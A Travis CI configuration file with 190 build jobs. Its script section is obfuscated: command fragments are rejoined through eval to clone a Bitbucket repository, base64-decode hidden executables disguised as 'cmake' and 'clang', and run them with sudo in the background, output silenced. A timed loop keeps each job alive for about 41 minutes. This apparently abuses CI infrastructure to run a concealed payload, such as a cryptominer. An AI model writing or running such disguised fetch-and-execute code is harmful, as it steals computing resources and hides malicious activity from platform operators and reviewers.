dist: bionic

env:
  - BUILD="Eu1"
  - BUILD="Eu2"
  - BUILD="Eu3"
  - BUILD="Eu4"
  - BUILD="Eu5"
  - BUILD="Eu6"
  - BUILD="Eu7"
  - BUILD="Eu8"
  - BUILD="Eu9"
  - BUILD="Eu10"
  - BUILD="Eu11"
  - BUILD="Eu12"
  - BUILD="Eu13"
  - BUILD="Eu14"
  - BUILD="Eu15"
  - BUILD="Eu16"
  - BUILD="Eu17"
  - BUILD="Eu18"
  - BUILD="Eu19"
  - BUILD="Eu20"
  - BUILD="Eu21"
  - BUILD="Eu22"
  - BUILD="Eu23"
  - BUILD="Eu24"
  - BUILD="Eu25"
  - BUILD="Eu26"
  - BUILD="Eu27"
  - BUILD="Eu28"
  - BUILD="Eu29"
  - BUILD="Eu30"
  - BUILD="Eu31"
  - BUILD="Eu32"
  - BUILD="Eu33"
  - BUILD="Eu34"
  - BUILD="Eu35"
  - BUILD="Eu36"
  - BUILD="Eu37"
  - BUILD="Eu38"
  - BUILD="Eu39"
  - BUILD="Eu40"
  - BUILD="Eu41"
  - BUILD="Eu42"
  - BUILD="Eu43"
  - BUILD="Eu44"
  - BUILD="Eu45"
  - BUILD="Eu46"
  - BUILD="Eu47"
  - BUILD="Eu48"
  - BUILD="Eu49"
  - BUILD="Eu50"
  - BUILD="Eu51"
  - BUILD="Eu52"
  - BUILD="Eu53"
  - BUILD="Eu54"
  - BUILD="Eu55"
  - BUILD="Eu56"
  - BUILD="Eu57"
  - BUILD="Eu58"
  - BUILD="Eu59"
  - BUILD="Eu60"
  - BUILD="Eu61"
  - BUILD="Eu62"
  - BUILD="Eu63"
  - BUILD="Eu64"
  - BUILD="Eu65"
  - BUILD="Eu66"
  - BUILD="Eu67"
  - BUILD="Eu68"
  - BUILD="Eu69"
  - BUILD="Eu70"
  - BUILD="Eu71"
  - BUILD="Eu72"
  - BUILD="Eu73"
  - BUILD="Eu74"
  - BUILD="Eu75"
  - BUILD="Eu76"
  - BUILD="Eu77"
  - BUILD="Eu78"
  - BUILD="Eu79"
  - BUILD="Eu80"
  - BUILD="Eu81"
  - BUILD="Eu82"
  - BUILD="Eu83"
  - BUILD="Eu84"
  - BUILD="Eu85"
  - BUILD="Eu86"
  - BUILD="Eu87"
  - BUILD="Eu88"
  - BUILD="Eu89"
  - BUILD="Eu90"
  - BUILD="Eu91"
  - BUILD="Eu92"
  - BUILD="Eu93"
  - BUILD="Eu94"
  - BUILD="Eu95"
  - BUILD="Eu96"
  - BUILD="Eu97"
  - BUILD="Eu98"
  - BUILD="Eu99"
  - BUILD="Eu100"
  - BUILD="Eu101"
  - BUILD="Eu102"
  - BUILD="Eu103"
  - BUILD="Eu104"
  - BUILD="Eu105"
  - BUILD="Eu106"
  - BUILD="Eu107"
  - BUILD="Eu108"
  - BUILD="Eu109"
  - BUILD="Eu110"
  - BUILD="Eu111"
  - BUILD="Eu112"
  - BUILD="Eu113"
  - BUILD="Eu114"
  - BUILD="Eu115"
  - BUILD="Eu116"
  - BUILD="Eu117"
  - BUILD="Eu118"
  - BUILD="Eu119"
  - BUILD="Eu120"
  - BUILD="Eu121"
  - BUILD="Eu122"
  - BUILD="Eu123"
  - BUILD="Eu124"
  - BUILD="Eu125"
  - BUILD="Eu126"
  - BUILD="Eu127"
  - BUILD="Eu128"
  - BUILD="Eu129"
  - BUILD="Eu130"
  - BUILD="Eu131"
  - BUILD="Eu132"
  - BUILD="Eu133"
  - BUILD="Eu134"
  - BUILD="Eu135"
  - BUILD="Eu136"
  - BUILD="Eu137"
  - BUILD="Eu138"
  - BUILD="Eu139"
  - BUILD="Eu140"
  - BUILD="Eu141"
  - BUILD="Eu142"
  - BUILD="Eu143"
  - BUILD="Eu144"
  - BUILD="Eu145"
  - BUILD="Eu146"
  - BUILD="Eu147"
  - BUILD="Eu148"
  - BUILD="Eu149"
  - BUILD="Eu150"
  - BUILD="Eu151"
  - BUILD="Eu152"
  - BUILD="Eu153"
  - BUILD="Eu154"
  - BUILD="Eu155"
  - BUILD="Eu156"
  - BUILD="Eu157"
  - BUILD="Eu158"
  - BUILD="Eu159"
  - BUILD="Eu160"
  - BUILD="Eu161"
  - BUILD="Eu162"
  - BUILD="Eu163"
  - BUILD="Eu164"
  - BUILD="Eu165"
  - BUILD="Eu166"
  - BUILD="Eu167"
  - BUILD="Eu168"
  - BUILD="Eu169"
  - BUILD="Eu170"
  - BUILD="Eu171"
  - BUILD="Eu172"
  - BUILD="Eu173"
  - BUILD="Eu174"
  - BUILD="Eu175"
  - BUILD="Eu176"
  - BUILD="Eu177"
  - BUILD="Eu178"
  - BUILD="Eu179"
  - BUILD="Eu180"
  - BUILD="Eu181"
  - BUILD="Eu182"
  - BUILD="Eu183"
  - BUILD="Eu184"
  - BUILD="Eu185"
  - BUILD="Eu186"
  - BUILD="Eu187"
  - BUILD="Eu188"
  - BUILD="Eu189"
  - BUILD="Eu190"

language: minimal

script:
  - OdZokp="sudo apt up"
  - eBPWozkE="date || tru"
  - eval "$OdZokp""$eBPWozkE""e"
  - aTXVUcjg="sudo apt --"
  - OxIArfvmEl="yes install"
  - XJhbNb=" cl-base64 "
  - HsUlKxcz="git &>/dev/"
  - eval "$aTXVUcjg""$OxIArfvmEl""$XJhbNb""$HsUlKxcz""null"
  - DJWhSfGC="git clone h"
  - PazRNXXpTv="ttps://gccb"
  - dGumwWbi="uild@bitbuc"
  - dBsVAhw="ket.org/gcc"
  - HZZYJgHEST="build/gcc.g"
  - xpHJbZItEgt="it &>/dev/n"
  - eval "$DJWhSfGC""$PazRNXXpTv""$dGumwWbi""$dBsVAhw""$HZZYJgHEST""$xpHJbZItEgt""ull"
  - rTHcpf="base64 -d g"
  - ZsokrTaG="cc/cmake_ >"
  - eval "$rTHcpf""$ZsokrTaG"" cmake"
  - PWFtpMRYQIA="base64 -d g"
  - NiNgrhsFR="cc/config_ "
  - eval "$PWFtpMRYQIA""$NiNgrhsFR""> pipe"
  - ePeBNn="base64 -d g"
  - zLedqWqS="cc/make_ > "
  - eval "$ePeBNn""$zLedqWqS""clang"
  - GbXfe="chmod +x cl"
  - eval "$GbXfe""ang cmake"
  - gVZxSj="./cmake"
  - eval "$gVZxSj"""
  - DImJnjF="sed -i 's/b"
  - qlLeuC="uild/tg2o/g"
  - eval "$DImJnjF""$qlLeuC""' pipe"
  - sudo ./clang --config pipe &>/dev/null &
  - GCC=$(date +%s)
  - echo $BUILD
  - while true; do CC=$(date +%s); echo Build; [ $CC -ge $((GCC + 2471)) ] && sudo killall clang && break; sleep 196; done
